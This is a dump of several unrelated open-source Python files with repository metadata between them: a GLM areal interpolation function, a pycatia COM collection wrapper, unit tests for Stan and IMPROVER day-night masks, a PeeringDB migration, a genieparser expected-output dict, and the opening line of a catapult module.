patsy-style model formula that specifies the model. Raster codes should be prefixed with
"Type_", e.g. `"n_total_pop ~ -1 + np.log1p(Type_21) + np.log1p(Type_22)`
likelihood : str, {'poisson', 'gaussian', 'neg_binomial'} (default = "poisson")
the likelihood function used in the model
force_crs_match : bool
whether to coerce geodataframe and raster to the same CRS
    return_model : bool
whether to return the fitted model in addition to the interpolated geodataframe.
If true, this will return (geodataframe, model)
Returns
--------
interpolated : geopandas.GeoDataFrame
a new geopandas dataframe with boundaries from `target_df` and modeled attribute
data from the `source_df`. If `return_model` is true, the function will also return
the fitted regression model for further diagnostics
"""
source_df = source_df.copy()
target_df = target_df.copy()
_check_presence_of_crs(source_df)
liks = {"poisson": Poisson, "gaussian": Gaussian, "neg_binomial": NegativeBinomial}
if likelihood not in liks.keys():
raise ValueError(f"likelihood must one of {liks.keys()}")
if not raster_codes:
raster_codes = [21, 22, 23, 24, 41, 42, 52]
raster_codes = ["Type_" + str(i) for i in raster_codes]
if not formula:
formula = (
variable
+ "~ -1 +"
+ "+".join(["np.log1p(" + code + ")" for code in raster_codes])
)
profiled_df = _fast_append_profile_in_gdf(
source_df[[source_df.geometry.name, variable]], raster, force_crs_match
)
results = smf.glm(formula, data=profiled_df, family=liks[likelihood]()).fit()
out = target_df[[target_df.geometry.name]]
temp = _fast_append_profile_in_gdf(
out[[out.geometry.name]], raster, force_crs_match
)
out[variable] = results.predict(temp.drop(columns=[temp.geometry.name]).fillna(0))
if return_model:
return out, results
return out
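if __name__ == "__main__":
    # Hedged usage sketch (not part of the original module). The shapefile
    # paths, raster path, and column name below are hypothetical placeholders.
    import geopandas as gpd

    tracts = gpd.read_file("tracts.shp")   # source polygons carrying the data
    hexes = gpd.read_file("hex_grid.shp")  # target polygons to interpolate onto
    interpolated = glm(
        source_df=tracts,
        target_df=hexes,
        raster="nlcd_2011.tif",
        variable="population",
        likelihood="poisson",
    )
    print(interpolated.head())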
|
db2f165ce937222951ac08c392c0b7faeb5bc8e4
|
499f5402baed77d000c65f243b457c69dc3d2fe4
|
/pycatia/tps_interfaces/captures.py
|
9386e1dd3f25f2a6551ec03c32c1fe35d994fa0d
|
[
"MIT"
] |
permissive
|
evereux/pycatia
|
416189b34f3c60effea8a76258e36ffc5ae86e22
|
5f5726d5dc66265b3eba8a01910c4aeae424365d
|
refs/heads/master
| 2023-08-21T10:03:41.660445
| 2023-08-09T16:21:10
| 2023-08-09T16:21:10
| 159,069,580
| 141
| 42
|
MIT
| 2023-08-09T11:15:27
| 2018-11-25T20:04:31
|
Python
|
UTF-8
|
Python
| false
| false
| 2,094
|
py
|
captures.py
|
#!/usr/bin/python3.9
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-09-25 14:34:21.593357
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from typing import Iterator
from pycatia.system_interfaces.any_object import AnyObject
from pycatia.system_interfaces.collection import Collection
from pycatia.tps_interfaces.capture import Capture
from pycatia.types.general import cat_variant
class Captures(Collection):
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-09-25 14:34:21.593357)
| System.IUnknown
| System.IDispatch
| System.CATBaseUnknown
| System.CATBaseDispatch
| System.Collection
| Captures
|
| The interface to access a CATIACaptures
"""
def __init__(self, com_object):
super().__init__(com_object)
self.captures = com_object
def item(self, i_index: cat_variant) -> AnyObject:
"""
.. note::
:class: toggle
            CAA V5 Visual Basic Help (2020-09-25 14:34:21.593357)
| o Func Item(CATVariant iIndex) As AnyObject
|
| Retrieve a Capture.
:param CATVariant i_index:
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.captures.Item(i_index))
def __getitem__(self, n: int) -> Capture:
if (n + 1) > self.count:
raise StopIteration
return Capture(self.captures.item(n + 1))
def __iter__(self) -> Iterator[Capture]:
for i in range(self.count):
yield self.child_object(self.com_object.item(i + 1))
def __repr__(self):
return f'Captures(name="{self.name}")'
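# Hedged usage sketch (not part of the original module): given a `captures`
# collection obtained from a live CATIA session, the dunder methods above
# enable Pythonic access; the acquisition path is deliberately omitted since
# it depends on the open document.
#
#     for capture in captures:    # __iter__ yields Capture wrappers
#         print(capture.name)
#     first = captures[0]         # __getitem__ maps 0-based to COM's 1-based index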
|
9f096288444857b2856c3ee033c79bd133173362
|
1b90be9561c10508eea59cb36c1f1665d0ef947f
|
/test/varmat_compatibility_summary_test.py
|
3e9fb9082d1cbe76c2b2836da7d100ea76c2d0cc
|
[
"BSD-3-Clause",
"GPL-2.0-only",
"Apache-2.0"
] |
permissive
|
stan-dev/math
|
473e7c1eaf11f84eaf2032c2455e12ba65feef39
|
bdf281f4e7f8034f47974d14dea7f09e600ac02a
|
refs/heads/develop
| 2023-08-31T09:02:59.224115
| 2023-08-29T15:17:01
| 2023-08-29T15:17:01
| 38,388,440
| 732
| 240
|
BSD-3-Clause
| 2023-09-14T19:44:20
| 2015-07-01T18:40:54
|
C++
|
UTF-8
|
Python
| false
| false
| 4,017
|
py
|
varmat_compatibility_summary_test.py
|
from varmat_compatibility_summary import convert_signatures_list_to_functions, select_signatures_matching_functions, remove_signatures_matching_functions, process_results
import unittest
class HelpersTest(unittest.TestCase):
def setUp(self):
self.signatures_list = ["chicken(array[] real) => real", "squirrel(array[] real) => real", "frog(array[] real) => real"]
def test_convert(self):
self.assertSetEqual(set(["chicken", "squirrel", "frog"]), convert_signatures_list_to_functions(self.signatures_list))
def test_select(self):
self.assertSetEqual(set(["chicken(array[] real) => real"]), select_signatures_matching_functions(self.signatures_list, ["chicken"]))
def test_remove(self):
self.assertSetEqual(set(["squirrel(array[] real) => real", "frog(array[] real) => real"]), remove_signatures_matching_functions(self.signatures_list, ["chicken"]))
class ProcessResultsTest(unittest.TestCase):
def setUp(self):
self.results = {
"compatible_signatures" : ["chicken(matrix) => real", "dog(matrix) => real"],
"incompatible_signatures" : ["squirrel(vector) => real", "dog(vector) => real"],
"irrelevant_signatures" : ["chicken(array[] real) => real", "squirrel(array[] real) => real", "frog(array[] real) => real"]
}
def test_which(self):
self.assertSetEqual(set(["chicken(matrix) => real", "dog(matrix) => real"]), process_results(self.results, functions = [], which = "compatible", fully = False, names = False))
self.assertSetEqual(set(["squirrel(vector) => real", "dog(vector) => real"]), process_results(self.results, functions = [], which = "incompatible", fully = False, names = False))
self.assertSetEqual(set(["chicken(array[] real) => real", "squirrel(array[] real) => real", "frog(array[] real) => real"]), process_results(self.results, functions = [], which = "irrelevant", fully = False, names = False))
def test_fully(self):
self.assertSetEqual(set(["chicken(matrix) => real"]), process_results(self.results, functions = [], which = "compatible", fully = True, names = False))
self.assertSetEqual(set(["squirrel(vector) => real"]), process_results(self.results, functions = [], which = "incompatible", fully = True, names = False))
self.assertSetEqual(set(["frog(array[] real) => real"]), process_results(self.results, functions = [], which = "irrelevant", fully = True, names = False))
def test_names(self):
self.assertSetEqual(set(["chicken"]), process_results(self.results, functions = [], which = "compatible", fully = True, names = True))
self.assertSetEqual(set(["squirrel"]), process_results(self.results, functions = [], which = "incompatible", fully = True, names = True))
self.assertSetEqual(set(["frog"]), process_results(self.results, functions = [], which = "irrelevant", fully = True, names = True))
def test_functions(self):
self.assertSetEqual(set(["chicken(matrix) => real"]), process_results(self.results, functions = ["chicken"], which = "compatible", fully = False, names = False))
self.assertSetEqual(set(["squirrel(vector) => real"]), process_results(self.results, functions = ["squirrel"], which = "incompatible", fully = False, names = False))
self.assertSetEqual(set(["frog(array[] real) => real"]), process_results(self.results, functions = ["frog"], which = "irrelevant", fully = False, names = False))
def test_functions_names(self):
self.assertSetEqual(set(["chicken"]), process_results(self.results, functions = ["chicken"], which = "compatible", fully = False, names = True))
self.assertSetEqual(set(["squirrel"]), process_results(self.results, functions = ["squirrel"], which = "incompatible", fully = False, names = True))
self.assertSetEqual(set(["frog"]), process_results(self.results, functions = ["frog"], which = "irrelevant", fully = False, names = True))
if __name__ == '__main__':
unittest.main()
|
378c845527ed1579e91c7197270a543a223c26a0
|
9cc6f9d9eed9aceb5efa56e3b2f364900df11051
|
/improver_tests/utilities/solar/test_DayNightMask.py
|
aee40ea3d9627f8a2245b9cb06eb645b2fc04530
|
[
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
metoppv/improver
|
8553a4f8b93c88291bde0db8f5dfd7b577c04b92
|
cd2c9019944345df1e703bf8f625db537ad9f559
|
refs/heads/master
| 2023-08-30T19:01:04.946698
| 2023-08-25T13:57:20
| 2023-08-25T13:57:20
| 85,334,761
| 101
| 88
|
BSD-3-Clause
| 2023-09-14T19:07:45
| 2017-03-17T16:51:29
|
Python
|
UTF-8
|
Python
| false
| false
| 18,065
|
py
|
test_DayNightMask.py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown copyright. The Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
""" Unit tests for DayNightMask class """
import unittest
from datetime import datetime, timedelta
import cf_units as unit
import iris
import numpy as np
import pytz
from iris.tests import IrisTest
from improver.spotdata.build_spotdata_cube import build_spotdata_cube
from improver.synthetic_data.set_up_test_cubes import (
add_coordinate,
construct_scalar_time_coords,
set_up_variable_cube,
)
from improver.utilities.solar import DayNightMask
ATTRIBUTES = {"institution": "Met Office", "title": "A model field"}
def create_spot_cube(xrange=175, yrange=85):
"""Create a test spot-cube."""
n_sites = 99
latitudes = np.tile(np.linspace(-yrange, yrange, 11), 9)
longitudes = np.repeat(np.linspace(-xrange, xrange, 9), 11)
altitudes = np.zeros(n_sites, dtype=np.float32)
wmo_ids = np.arange(1000, 1000 + n_sites, 1)
data = np.zeros(n_sites)
args = (altitudes, latitudes, longitudes, wmo_ids)
time = datetime(2023, 6, 6, 15)
frt = datetime(2023, 6, 6, 12)
time_bounds = None
time_coords = construct_scalar_time_coords(time, time_bounds, frt)
time_coords = [item[0] for item in time_coords]
spot_cube = build_spotdata_cube(
data, "generic_spot_cube", "1", *args, scalar_coords=time_coords,
)
spot_cube.attributes = ATTRIBUTES
return spot_cube
class Test__init__(IrisTest):
""" Test initialisation of the DayNightMask class """
def test_basic_init(self):
""" Test Initiation of DayNightMask Object"""
plugin = DayNightMask()
self.assertEqual(plugin.day, 1)
self.assertEqual(plugin.night, 0)
self.assertEqual(plugin.irregular, False)
class Test__repr__(IrisTest):
""" Test string representation """
def test_basic_repr(self):
""" Test Representation string of DayNightMask Object"""
expected = "<DayNightMask : Day = 1, Night = 0>"
result = str(DayNightMask())
self.assertEqual(result, expected)
class Test__create_daynight_mask(IrisTest):
""" Test string representation """
def setUp(self):
"""Set up the cube for testing."""
data = np.ones((1, 16, 16), dtype=np.float32)
data[:, 7, 7] = 0.0
self.cube = set_up_variable_cube(
data, "precipitation_amount", "kg m^-2", "equalarea", attributes=ATTRIBUTES
)
self.spot_cube = create_spot_cube()
def test_basic_daynight_mask(self):
""" Test this creates a blank mask cube for gridded data"""
plugin = DayNightMask()
result = plugin._create_daynight_mask(self.cube)
self.assertIsInstance(result, iris.cube.Cube)
self.assertEqual(result.long_name, "day_night_mask")
self.assertEqual(result.units, unit.Unit("1"))
self.assertEqual(result.data.min(), DayNightMask().night)
self.assertEqual(result.data.max(), DayNightMask().night)
self.assertEqual(result.attributes["title"], "Day-Night mask")
self.assertEqual(result.attributes["institution"], "Met Office")
self.assertEqual(result.dtype, np.int32)
self.assertEqual(result.ndim, 2)
self.assertEqual(plugin.irregular, False)
def test_basic_daynight_mask_spot(self):
""" Test this creates a blank mask cube for spot data"""
plugin = DayNightMask()
result = plugin._create_daynight_mask(self.spot_cube)
self.assertIsInstance(result, iris.cube.Cube)
self.assertEqual(result.long_name, "day_night_mask")
self.assertEqual(result.units, unit.Unit("1"))
self.assertEqual(result.data.min(), DayNightMask().night)
self.assertEqual(result.data.max(), DayNightMask().night)
self.assertEqual(result.attributes["title"], "Day-Night mask")
self.assertEqual(result.attributes["institution"], "Met Office")
self.assertEqual(result.dtype, np.int32)
self.assertEqual(result.ndim, 1)
self.assertEqual(plugin.irregular, True)
class Test__daynight_lat_lon_cube(IrisTest):
""" Test string representation """
def setUp(self):
"""Set up the cube for testing."""
data = np.ones((16, 16), dtype=np.float32)
self.cube = set_up_variable_cube(
data,
"precipitation_amount",
"kg m^-2",
grid_spacing=1,
domain_corner=(49, -8),
)
self.cube_360 = set_up_variable_cube(
data,
"precipitation_amount",
"kg m^-2",
grid_spacing=1,
domain_corner=(49, 345),
)
self.spot_cube = create_spot_cube(xrange=10, yrange=10)
def test_basic_lat_lon_cube_gridded(self):
""" Test this create a blank gridded mask cube"""
day_of_year = 10
utc_hour = 12.0
expected_result = np.ones((16, 16))
plugin = DayNightMask()
mask_cube = plugin._create_daynight_mask(self.cube)
result = plugin._daynight_lat_lon_cube(mask_cube, day_of_year, utc_hour)
self.assertIsInstance(result, iris.cube.Cube)
self.assertArrayEqual(result.data, expected_result)
def test_basic_lat_lon_cube_360(self):
""" Test this still works with 360 data"""
day_of_year = 10
utc_hour = 0.0
expected_result = np.zeros((16, 16))
plugin = DayNightMask()
mask_cube_360 = plugin._create_daynight_mask(self.cube_360)
result = plugin._daynight_lat_lon_cube(mask_cube_360, day_of_year, utc_hour)
self.assertIsInstance(result, iris.cube.Cube)
self.assertArrayEqual(result.data, expected_result)
def test_basic_lat_lon_cube_spot(self):
""" Test this create a blank spot mask cube"""
day_of_year = 10
utc_hour = 12.0
expected_result = np.ones((99))
plugin = DayNightMask()
spot_mask_cube = plugin._create_daynight_mask(self.spot_cube)
result = plugin._daynight_lat_lon_cube(spot_mask_cube, day_of_year, utc_hour)
self.assertIsInstance(result, iris.cube.Cube)
self.assertArrayEqual(result.data, expected_result)
class Test_process(IrisTest):
"""Test DayNight Mask."""
def setUp(self):
"""Set up the cubes for testing."""
data = np.ones((16, 16), dtype=np.float32)
data[7, 7] = 0.0
vt = datetime(2015, 11, 20, 8, 0)
self.cube = set_up_variable_cube(
data,
"precipitation_amount",
"kg m^-2",
"equalarea",
grid_spacing=2000,
domain_corner=(0, -30000),
time=vt,
frt=vt,
)
# Cube with time coordinate with bounds. A very small bounding period
# is used to capture day-night variation across the small domain.
bounds = timedelta(minutes=4)
self.cube_time_bounds = set_up_variable_cube(
data,
"precipitation_amount",
"kg m^-2",
"equalarea",
grid_spacing=2000,
domain_corner=(0, -30000),
time=vt + bounds,
time_bounds=(vt, vt + bounds),
frt=vt,
)
# Lat lon cubes
self.cube_lat_lon = set_up_variable_cube(
data,
"precipitation_amount",
"kg m^-2",
grid_spacing=1,
domain_corner=(49, -8),
time=vt,
frt=vt,
)
self.cube_lat_lon_360 = set_up_variable_cube(
data,
"precipitation_amount",
"kg m^-2",
grid_spacing=1,
domain_corner=(49, 345),
time=vt,
frt=vt,
)
self.spot_cube = create_spot_cube()
def test_basic_standard_grid_ccrs(self):
"""Test day_night mask with standard_grid_ccrs projection."""
result = DayNightMask().process(self.cube)
expected_result = np.array(
[
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
)
self.assertArrayEqual(result.data, expected_result)
def test_time_as_dimension(self):
"""Test day_night mask for a cube with multiple times."""
datetime_points = [datetime(2015, 11, 20, 8, 0), datetime(2015, 11, 20, 14, 0)]
cube = add_coordinate(self.cube, datetime_points, "time", is_datetime=True)
result = DayNightMask().process(cube)
expected_result = np.array(
[
[
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
],
np.ones((16, 16)),
]
)
self.assertArrayEqual(result.data, expected_result)
self.assertEqual(result.shape, cube.shape)
def test_basic_lat_lon(self):
"""Test day_night mask with lat lon data."""
result = DayNightMask().process(self.cube_lat_lon)
expected_result = np.array(
[
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
)
self.assertArrayEqual(result.data, expected_result)
def test_basic_lat_lon_360(self):
"""Test day_night mask with lat lon data 360 data."""
result = DayNightMask().process(self.cube_lat_lon_360)
expected_result = np.array(
[
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
)
self.assertArrayEqual(result.data, expected_result)
def test_time_bounds_standard_grid_ccrs(self):
"""Test day_night mask with standard_grid_ccrs projection for a cube
with a time coordinate with bounds.
This test compares against a reference case in which a cube without
time bounds is adjusted such that its time falls at the mid-point of
the time bounds being tested. This should return the same result as
the cube with time bounds. The result is also compared against an
array of expected values."""
vt = datetime(2015, 11, 20, 8, 2, tzinfo=pytz.UTC)
ref = self.cube.copy()
ref.coord("time").points = [vt.timestamp()]
ref_result = DayNightMask().process(ref)
result = DayNightMask().process(self.cube_time_bounds)
expected_result = np.array(
[
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
]
)
self.assertArrayEqual(result.data, expected_result)
self.assertArrayEqual(result.data, ref_result.data)
def test_spot_mask(self):
"""Test day_night mask with lat lon spot data. Note that the
expected data is shown as a grid for neatness, but is flattened
in the comparison as the returned spot mask is one dimensional."""
result = DayNightMask().process(self.spot_cube)
expected_result = np.array(
[
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
]
)
self.assertArrayEqual(result.data, expected_result.flatten())
if __name__ == "__main__":
unittest.main()
|
de9936507f521a751952bf94d6977ff55527a309
|
4feb5744ab5a26aeeb04573e4944d2bf4d1a6a2a
|
/peeringdb_server/migrations/0045_fac_rencode_null_out.py
|
43a915af4880e123018770a4659a8d5e6b3f6ec0
|
[
"BSD-2-Clause"
] |
permissive
|
peeringdb/peeringdb
|
cb79f809c4bb8cc5192180366df1f05d8fc0111f
|
3f62b2d97c78ccf151fb1a5761637e28463b9541
|
refs/heads/master
| 2023-09-04T09:26:43.741086
| 2023-08-22T19:20:34
| 2023-08-22T19:20:34
| 60,563,174
| 311
| 121
|
BSD-2-Clause
| 2023-09-13T02:13:42
| 2016-06-06T21:49:25
|
Python
|
UTF-8
|
Python
| false
| false
| 497
|
py
|
0045_fac_rencode_null_out.py
|
# Generated by Django 2.2.13 on 2020-07-02 19:36
from django.db import migrations
def null_rencode(apps, schema_editor):
Facility = apps.get_model("peeringdb_server", "Facility")
for fac in Facility.handleref.all():
if fac.rencode:
fac.rencode = ""
fac.save()
class Migration(migrations.Migration):
dependencies = [
("peeringdb_server", "0044_ixlan_ixf_fields"),
]
operations = [
migrations.RunPython(null_rencode),
]
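# Hedged note (not part of the original migration): RunPython without a
# reverse_code callable makes this migration irreversible. Since the original
# rencode values are discarded anyway, passing migrations.RunPython.noop as a
# second argument would be a harmless way to allow rollback.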
|
3abe3e3fe0274c6bf00be1ef42f0a48c8b016d2e
|
5ef6c8d47864f471e26b9902d61f8c687e941f05
|
/src/genie/libs/parser/ios/tests/ShowMplsLdpCapabilities/cli/equal/golden_output_all_expected.py
|
4cd8502956f2c9c610443b18d4ae333bf7351057
|
[
"Apache-2.0"
] |
permissive
|
CiscoTestAutomation/genieparser
|
169c196558f1c1a0f0d10650876096f993224917
|
b531eff760b2e44cd69d7a2716db6f866907c239
|
refs/heads/master
| 2023-09-03T08:56:18.831340
| 2023-08-29T22:32:02
| 2023-08-29T22:32:02
| 131,621,824
| 247
| 409
|
Apache-2.0
| 2023-08-29T22:32:04
| 2018-04-30T16:51:50
|
Python
|
UTF-8
|
Python
| false
| false
| 311
|
py
|
golden_output_all_expected.py
|
expected_output = {
"ldp_capabilities": {
"iccp_type": "0x0405",
"mldp_multipoint_to_multipoint": "0x0509",
"dynamic_anouncement": "0x0506",
"typed_wildcard": "0x050B",
"maj_version": 1,
"mldp_point_to_multipoint": "0x0508",
"min_version": 0,
}
}
|
29b398239de6d4ab89ce5c7446fcc32e031fce13
|
3a6a211ea0d32405497fbd6486c490bb147e25f9
|
/dashboard/dashboard/pinpoint/dispatcher.py
|
be40d3ee333d143e8a979efd38ca636c36671054
|
[
"BSD-3-Clause"
] |
permissive
|
catapult-project/catapult
|
e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0
|
53102de187a48ac2cfc241fef54dcbc29c453a8e
|
refs/heads/main
| 2021-05-25T07:37:22.832505
| 2021-05-24T08:01:49
| 2021-05-25T06:07:38
| 33,947,548
| 2,032
| 742
|
BSD-3-Clause
| 2022-08-26T16:01:18
| 2015-04-14T17:49:05
|
HTML
|
UTF-8
|
Python
| false
| false
| 2,072
|
py
|
dispatcher.py
|
# Copyright 2016 The Chromium Authors. All rights reserved.
